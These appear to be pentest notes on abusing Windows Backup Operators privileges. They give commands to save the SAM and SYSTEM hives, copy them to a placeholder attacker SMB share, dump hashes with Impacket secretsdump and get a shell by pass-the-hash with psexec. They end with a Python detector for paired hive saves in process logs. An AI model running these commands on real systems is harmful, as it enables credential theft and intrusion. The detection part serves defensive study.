These privileges allow full read (SeBackup) and write (SeRestore) access to any file. The first allows for exfiltration, while the second allows binaries to be replaced at will (combine with service- or task-based attacks!). The “Backup Operators” group has both of these privileges!

Back up useful registry hives:

reg save HKLM\SYSTEM $SYSTEM_HIVE_FILE
reg save HKLM\SAM $SAM_HIVE_FILE

Run a local SMB server with Impacket:

impacket-smbserver -smb2support -username $CONNECTION_USER \
	-password $CONNECTION_PASSWORD $SHARE_NAME $PATH_TO_DIRECTORY

Then, just use copy on Windows:

copy $FILE \\$ATTACKER_IP\$SHARE_NAME\

Use Impacket to dump hashes from a hive and perform a pass-the-hash attack:

# Get hashes from SAM/SYSTEM hives
#
impacket-secretsdump -sam $SAM_HIVE_FILE \
	-system $SYSTEM_HIVE_FILE LOCAL
 
# Get a shell by passing a hash
#
impacket-psexec -hashes $FULL_NTLM_HASH $TARGET_USER@$TARGET_IP
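
On the detection side, the `reg save` step above shows up in process-creation logging when command lines are recorded. The following is an added example, not part of the original notes: it flags a host where the same account saves both the SAM and SYSTEM hives within a short window. The event field names, the five-minute window and the sample records are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# "reg save" / "reg.exe save" aimed at a whole credential-bearing hive.
HIVE_SAVE = re.compile(
    r'\breg(?:\.exe)?"?\s+save\s+"?(?:HKLM|HKEY_LOCAL_MACHINE)'
    r'\\(SAM|SYSTEM|SECURITY)(?=["\s])',
    re.IGNORECASE,
)

# Constructed sample records, shaped like process-creation events
# (field names are assumptions, not a real log schema).
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:05", "host": "SRV01", "user": "CORP\\svc_backup",
     "cmd": r"reg save HKLM\SYSTEM C:\Temp\system.hiv"},
    {"time": "2024-05-01T10:00:20", "host": "SRV01", "user": "CORP\\svc_backup",
     "cmd": r"reg.exe save hklm\sam C:\Temp\sam.hiv"},
    {"time": "2024-05-01T10:03:00", "host": "WS07", "user": "CORP\\alice",
     "cmd": r"reg query HKLM\SYSTEM\CurrentControlSet\Services"},
    {"time": "2024-05-01T09:00:00", "host": "WS09", "user": "CORP\\bob",
     "cmd": r"reg save HKLM\SYSTEM D:\img\system.bak"},
    {"time": "2024-05-01T11:00:00", "host": "WS09", "user": "CORP\\bob",
     "cmd": r"reg save HKLM\SAM D:\img\sam.bak"},
]


def find_hive_dumps(events, window=timedelta(minutes=5)):
    """Alert when one user saves both SAM and SYSTEM on a host within `window`."""
    seen = {}    # (host, user) -> {hive name: time it was last saved}
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        match = HIVE_SAVE.search(ev["cmd"])
        if not match:
            continue
        hives = seen.setdefault((ev["host"], ev["user"]), {})
        hives[match.group(1).upper()] = datetime.fromisoformat(ev["time"])
        # SAM hashes are only recoverable offline together with SYSTEM,
        # so the pair is the signal; a lone save is kept as context only.
        if {"SAM", "SYSTEM"} <= hives.keys() and \
                abs(hives["SAM"] - hives["SYSTEM"]) <= window:
            alerts.append({"host": ev["host"], "user": ev["user"],
                           "hives": sorted(hives)})
            hives.clear()
    return alerts


if __name__ == "__main__":
    for alert in find_hive_dumps(SAMPLE_EVENTS):
        print("ALERT hive pair saved:", alert)
```

Pairing this with a review of who holds membership in “Backup Operators” narrows the set of accounts for which such an alert is expected.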